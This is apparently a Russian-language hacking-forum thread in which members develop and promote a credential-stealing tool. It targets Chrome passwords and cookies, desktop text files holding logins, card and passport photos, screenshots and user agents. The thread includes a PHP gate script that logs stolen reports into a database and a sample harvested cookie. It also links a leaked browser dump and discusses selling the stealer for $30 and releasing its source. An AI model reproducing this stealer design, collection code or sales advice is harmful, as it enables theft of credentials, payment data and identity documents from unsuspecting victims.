Продолжай и желаю удачи !
грабер чего ?Лоудер и грабер еше
Файлов с рабочего столаграбер чего ?
+++Файлов с рабочего стола
Там часто тоже есть в тхт логин пароль фото сс фото паспорта кх и т.д
очень полезная фича когда стилит юзер агент
<?php
if (isset($_POST["report"]) && isset($_POST["date"]) && isset($_POST["ip"]) && isset($_POST["country"]))
{
require_once "include/db.php";
$report = $_POST["report"];
$date = $_POST["date"];
$ip = $_POST["ip"];
$country = $_POST["country"];
$stmt = $db->prepare("INSERT INTO `logs` SET `ip` = :ip, `country` = :country, `date` = :date, `report` = :report");
$stmt->execute(array('ip' => $ip, 'country' => $country, 'date' => $date, 'report' => $report));
echo "succes";
}
?>
Value: db083a4b-5bef-4019-bad1-929f4d31f870
HostKey: gravitytales.com
Name: consentId
Path: /
Expires: 13261640952000000
isSecure: 0
Вот в таком виде куки пойдут ?
Или что-то пропустил ?Код:Value: db083a4b-5bef-4019-bad1-929f4d31f870 HostKey: gravitytales.com Name: consentId Path: / Expires: 13261640952000000 isSecure: 0
понял , принялGoogleChrome_Default.txt - AnonFiles
anonfiles.com
Продавать ? Расшифровку 80+ я взял с гитхаба ... а это по сути большая часть .Делай на 4.5, че мозги то ебать и го продавать за 30 баксов.
Шли данные (ключ для декрипта, заифрованные данные) в шифрованном json на сервер, там уже расшифровывай, пихай в архив и тдВообщем ребят , такой расклад .
Если и дальше делать под net 4.0 то придётся юзать костыли (отправлять файл паролей и кук на сервер отдельно)
Если делать стандартно/как у всех (1 архивом) то придётся юзать net 4.5
Какой вариант предпочтительней ?
ps : возможно и есть вариант реализовать архив под 4.0 НО
1) сторонние dll я юзать не хочу
2) моих знаний тупо не хватает -_-
без хайда никак?(Сделал зеркало
Скрытое содержимое
Он и так минимальный ...без хайда никак?(
10 лайков, жуть какаяОн и так минимальный ...
Вот именно . Всего 1010 лайков, жуть какая
очень круто, а стилит пока только хром?Если что обнова уже готова (собиралка кук , текстовых файлов с рабочего стола , скриншота) . Просто нужно немного админку поправить и выложу . Как время найду сделаю .
Ага , код для стилла других браузеров есть в гугле (да и на гитхабе) но мне чёт лень его дёргать .... Выкладываю с исходниками так что если кому нужно сами прикрутяточень круто, а стилит пока только хром?